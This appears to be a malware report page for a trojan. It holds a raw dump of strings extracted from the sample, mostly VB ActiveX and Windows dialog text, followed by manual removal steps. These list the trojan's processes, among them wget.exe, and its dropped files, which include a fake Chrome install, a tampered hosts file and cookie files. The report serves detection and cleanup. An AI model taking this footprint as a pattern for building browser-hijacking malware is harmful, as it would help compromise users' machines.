This certificate incorporates by reference, and its use is strictly subject to, the VeriSign Certification Practice Statement (CPS), available at: hXXps://VVV.verisign.com/CPS; by E-mail at [email protected]; or by mail at VeriSign, Inc., 2593 Coast Ave., Mountain View, CA 94043 USA Tel.  1 (415) 961-8830 Copyright (c) 1996 VeriSign, Inc. All Rights Reserved. CERTAIN WARRANTIES DISCLAIMED and LIABILITY LIMITED.

(hXXps://VVV.verisign.com/repository/CPS 0

hXXp://VVV.catalyst.com/0

MSVBVM60.DLL

1E5.TMP

%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB

VBA6.DLL

DXAnimatedGIF.ocx

STDOLE2.TLBWWW

.idata

@.rsrc

MSVBVM50.DLL

%Program Files%\DevStudio\VB\VB5.OLB

IiC:\WINNT\System32\MSVBVM50.dll\2

FC:\WINNT\System32\StdOle2.tlb

KeyDown

KeyPress

KeyUp

cmdOK

cmdOK_Click

UserControl_KeyDown

UserControl_KeyPress

UserControl_KeyUp

If you found bug, Pleace send an E-Mail to: [email protected], Thanks.

KeyCode

Occurs when the user presses a key while an object has the focus.

KeyAscii

Occurs when the user presses and releases an ANSI key.

Occurs when the user releases a key while an object has the focus.

fhMagicControlsB1.ocx

StdOle2.tlbWWW

.ForeColor1WW

.ForeColor2WW

.aKeyDownW

KeyCodeW

#KeyAsciiX

MKeyUpWWWX

Returns/sets the text displayed in an object's title bar or below an object's icon.WWWQ

Returns/sets the foreground color used to display text and graphics in an object.WW

Returns/sets the number of milliseconds between calls to a Timer control's Timer event.WWW

Occurs when the user presses a key while an object has the focus.W6

Occurs when the user presses and releases an ANSI key.B

Occurs when the user releases a key while an object has the focus.\

Returns/sets a value that determines whether an object can respond to user-generated events.WW

VB6ES.DLL

C:\Archivos de programa\Microsoft Visual Studio\VB98\VB6.OLB

F%System%\stdole2.tlb

Proyecto2.ocx

msvbvm60.dll\3

Returns/sets the background color used to display text and graphics in an object.WQ

Determines the line style for output from graphics methods.WWW

Sets a custom mouse icon.WM

LabelDegradado.ocx

MARCHOSO.MarchosoCtrl.1

MARCHOSO.MarchosoPropPage.1

MFC40.DLL

MARCHOSO.OCX

Error bmi.biHeight

Marchoso.hlpWW

7 7$70747

to1.vbOcxTextVertical

F%System%\STDOLE2.TLB

OcxTextVertical.ocx

ficos en un objeto.WW7

Devuelve o establece el estilo subrayado de una fuente.WWW^

Establece un icono personalizado para el mouse.WWW\

Devuelve o establece el tipo de puntero del mouse mostrado al pasar por encima de un objeto.WW$

Obliga a volver a dibujar un objeto.WWR

s lo vuelve a presionar y liberar sobre un objeto.WWY

Ocurre cuando el usuario mueve el mouse.WWW

n del mouse mientras un objeto tiene el enfoque.WWW

%System%\stdole2.tlb

progressbar-xp.ocx

C:\Programmi\Microsoft Visual Studio\VB98\VB6.OLB

[email protected]

SuperLine.ocx

TRANSPARENT.TransparentPropPage.1

TRANSPARENT.TransparentCtrl.1

TRANSPARENT.OCX

MSVCRT40.dll

trans.hlp

*\G{00020430-0000-0000-C000-000000000046}#1.0#0#C:\WIN95\SYSTEM\stdole32.tlb#

11111111

eee........TTTTTT

.......TTTT

.....TTTT

.....TTT

......KKK

....KKcc

 =)))) -68

))====3%%%*&

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">

</asmv3:windowsSettings>

aero.msstyles

winxp.royale.cjstyles

royale.msstyles

winxp.luna.cjstyles

luna.msstyles

12, 0, 2, 0

SkinFramework.OCX

Xtreme SkinFramework Control, Version 12.0.2

DB4C0D00-400B-101B-A3C9-08002B2F49FB

4D553650-6ABE-11cf-8ADB-00AA00C00905

28C4C820-401A-101B-A3C9-08002B2F49FB

HelpKey

CmDlg

Help&Key:

CMDialog ActiveX Control DLL

6.00.8169

CMDIALOG

is a registered trademark of Microsoft Corporation. Windows(TM) is a trademark of Microsoft Corporation

Printer Dialog Box Constants1Sets or returns state of All Pages option button. Sets or returns state of Collate check box.%Disables the Print to File check box.-The Print to File check box is not displayed.4Sets or returns the state of the Pages option button%Disables the Selection option button.<Prevents a warning message when there is no default printer.5Sets or returns the state of the Pages option button.EDisplays the Print Setup dialog box rather than the Print dialog box.9Sets or returns the state of the Print to File check box.3Returns a device context for the printer selection.

)Couldn't determine procedure address(es).!Failed to show the common dialog.HThe printer device driver failed to initialize a DevMode data structure.

Printer Orientation Constants$Dialog box displays the Help button.!Sets support for multiple copies.

Color Dialog Box Constants,Sets initial color value for the dialog box.KEntire dialog box is displayed, including the Define Custom Colors section.<Disables the Define Custom Colors section of the dialog box."Dialog box displays a Help button.#File Open/Save Dialog Box Constants=Checks Read Only check box for Open and Save As dialog boxes.<Generates a message box if the selected file already exists.

Hides the Read Only check box.JSets the current directory to what it was when the dialog box was invoked.1Causes the dialog box to display the Help button.4Allows invalid characters in the returned file name.:Allows the File Name list box to have multiple selections.LExtension of returned file name is different from the one set by DefaultExt.

%User can enter only valid path names.,User can enter only names of existing files.FAsks if the user wants to create a file that does not currently exist.)Sharing violation errors will be ignored.<The returned file will not have the Read Only attribute set. Windows 95 Open A File dialog box template.

Fonts Dialog Box Constants;Dialog box lists only screen fonts supported by the system.5Dialog box lists only fonts supported by the printer.4Dialog box lists available screen and printer fonts."Dialog box displays a Help button.7Dialog enables strikeout, underline, and color effects.$Dialog box enables the Apply button.@Dialog box allows only fonts that use the Windows character set.QReturns/sets the name (without the path) of the file to open or save at run time.4Displays the CommonDialog control's Open dialog box.7Displays the CommonDialog control's Save As dialog box.5Displays the CommonDialog control's Color dialog box.3Displays the CommonDialog control's Font dialog box7Displays the CommonDialog control's Printer dialog box.8Runs Winhelp.EXE and displays the Help file you specify.

3Dialog box should not allow vector-font selections.LDialog box should not allow graphic device interface (GDI) font simulations.HSelects font sizes within the range specified by Min and Max properties.0Dialog box should select only fixed-pitch fonts.LAllows only the selection of fonts available to both the screen and printer.GDisplays an error if a user selects a font or style that doesn't exist.>Dialog box should allow only the selection of scaleable fonts.>Dialog box should allow only the selection of True Type fonts.

"Portrait printer paper orientation#Landscape printer paper orientation

BThe Common Dialog function failed to parse the strings in WIN.INI.

KThe [devices] section of WIN.INI does not contain an entry for the printer.:The PDReturnDefault flag was set, but a field was nonzero./Application did not provide an instance handle.

Help Constants%Displays Help for a particular topic.ONotifies the Help application that the specified Help file is no longer in use..Displays the index of the specified Help file.5Displays the contents topic in the current Help file.3Display Help for using the Help application itself. Set the current Index for multi-index Help.2Designates a specific topic as the contents topic.0Displays a topic identified by a context number.

8Creates a Help file that displays text in only one font.'Displays Help for a particular keyword.'Displays Help for a particular command.'Call the search engine in Windows Help.6Returns/sets the path and filename of a selected file.=Sets the string displayed in the title bar of the dialog box.QReturns/sets the filters that are displayed in the Type list box of a dialog box.?Returns/sets the default filename extension for the dialog box.(Returns/sets the initial file directory. Returns/sets the selected color."Sets the options for a dialog box.LSpecifies the name of the font that appears in each row for the given level.

Returns/sets bold font styles. Returns/sets italic font styles.'Returns/sets strikethrough font styles.#Returns/sets underline font styles.8Returns/sets the value for the first page to be printed.8Returns/sets the value for the first page to be printed.RSets the smallest allowable font size (Font dialog) or print range (Print dialog).OReturns/sets the maximum font size (Font dialog) or print range (Print dialog).HReturns/sets a value that determines the number of copies to be printed.PIndicates whether an error is generated when the user chooses the Cancel button.CReturns/sets the name of the Help file associated with the project./Returns/sets the type of online Help requested.BReturns/sets the keyword that identifies the requested Help topic.fDetermines if user selections in the Print dialog box are used to change the default printer settings.@Returns/sets a default filter for an Open or Save As dialog box.8Returns/sets the context ID of the requested Help topic.XSpecifies the size (in points) of the font that appears in each row for the given level.4Returns/sets the type of dialog box to be displayed.TReturns/sets the maximum size of the filename opened using the CommonDialog control.IReturns a handle (from Microsoft Windows) to the object's device context.

The ENABLEHOOK flag was set in the Flags member of a common-dialog data structure but the application failed to provide a pointer to a corresponding hook function.RThe common dialog function was unable to lock the memory associated with a handle.VThe common dialog function was unable to allocate memory for internal data structures.?The common dialog function failed to lock a specified resource.?The common dialog function failed to load a specified resource.?The common dialog function failed to find a specified resource.=The common dialog function failed to load a specified string.

The ENABLETEMPLATE flag was set in the Flags member of a common-dialog data structure but the application failed to provide a corresponding template.wThe common dialog function failed during initialization. This error often occurs when insufficient memory is available.TThe lStructSize member of the corresponding common-dialog data structure is invalid.

Call to Windows Help failed.*The function failed during initialization.1The function failed to load a specified resource./The function failed to load a specified string.1The function failed to lock a specified resource.HThe function was unable to allocate memory for internal data structures.DThe function was unable to lock the memory associated with a handle.

BThe PrintDlg function failed when creating an information context.EDevMode and DevNames data structures describe two different printers.HThe printer-device driver failed to initialize a DEVMODE data structure.

]The [devices] section of the file WIN.INI did not contain an entry for the requested printer.PThe PrintDlg function failed when it attempted to create an information context.VThe data in the DEVMODE and DEVNAMES data structures describes two different printers.!A default printer does not exist.%No printer device-drivers were found.3The PrintDlg function failed during initialization.

The printer device-driver failed to initialize a DEVMODE data structure. (This error constant only applies to printer drivers written for Windows 3.0 or later versions.)KThe PrintDlg function failed to load the specified printer's device driver.

The PD_RETURNDEFAULT flag was set in the Flags member of the PRINTDLG data structure but either the hDevMode or hDevNames field were nonzero.dThe common dialog function failed to parse the strings in the [devices] section of the file WIN.INI.

SocketWrench Windows Sockets Control (32-bit)

2.50.2570

CSWSK32.OCX

SocketWrench Windows Sockets Control

,Invalid socket descriptor passed to function

Access denied"Invalid address passed to function

$Socket would block on this operation

Blocking function in progress.Function being cancelled has already completed,Invalid socket descriptor passed to function

Destination address is required1Datagram was too large to fit in specified buffer4Specified protocol is the wrong type for this socket'Socket option is unknown or unsupported#Specified protocol is not supported=Specified socket type is not supported in this address family!Socket operation is not supported*Specified protocol family is not supported:Specified address family is not supported by this protocol

Socket operation timed out$Connection refused by remote network

0Network subsystem is not ready for communication"Requested version is not available'Windows sockets library not initialised

HSocketWrench Windows Sockets Contro

*\AD:\ASM\products\dxanimatedgif\prjAniGif.vbp

tmp.gif

*\A%Program Files%\DevStudio\VB\fhMagicControls\fhMagicControlsB1.vbp

*\AE:\Luciano\CONTEN~1\RECURS~2\DLLOCX~1\OCX-FR~1\OCX-FR~4\Proyecto2.vbp

*\AE:\Luciano\CONTEN~1\RECURS~2\DLLOCX~1\2\OCX-LA~1\Label_TVH.vbp

2, 0, 0, 1

*\AD:\ocx-texto-vertical\Proyecto2.vbp

*\AC:\DOCUME~1\asd\ESCRIT~1\OCX-PR~1\Proyecto2.vbp

*\AC:\ocx\supline\SuperLine.vbp

2\Wliq.vbp

Fabio Guerrazzi, e-mail: [email protected]

1.00.0005

1, 1, 0, 1

3.5.4.26

host.exe

2.0.2.13

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   installer.exe:580
   Chromium.exe:1116
   wget.exe:612
   arsiv.exe:792
   %original file name%.exe:1676

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Application Data\Chromium.exe (11258 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.pak (4185 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.pak (1281 bytes)
   %Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.pak (2105 bytes)
   %System%\drivers\etc\hosts (269066 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.pak (3073 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\resources.pak (43124 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.dll (10 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.pak (4545 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.pak (1425 bytes)
   %Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.pak (3073 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\libpeerconnection.dll (15116 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.pak (2321 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jogoilaonpjembimhekgnboineibhdhf\bg.txt (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (73 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.pak (2105 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\setting (28 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\icudt.dll (76505 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\chrome_100_percent.pak (7345 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.pak (1281 bytes)
   %Documents and Settings%\%current user%\Desktop\Google Chrome.lnk (791 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.pak (1425 bytes)
   %Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\chrome.dll (360605 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.pak (2321 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.pak (1281 bytes)
   %Documents and Settings%\%current user%\Application Data\bg.txt (3 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.pak (2105 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\pingjs.js (34 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.pak (2321 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.pak (4185 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\pepflashplayer.dll (113356 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.pak (3073 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.pak (2321 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.dll (10 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@joojlee[1].txt (214 bytes)
   %Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\chrome.exe (5889 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\arsiv.exe (3878606 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\libpeerconnection.dll (56491 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll (277843 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.pak (4074 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\chrome.exe (30992 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\icudt.dll (455362 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.pak (5049 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.dll (9 bytes)
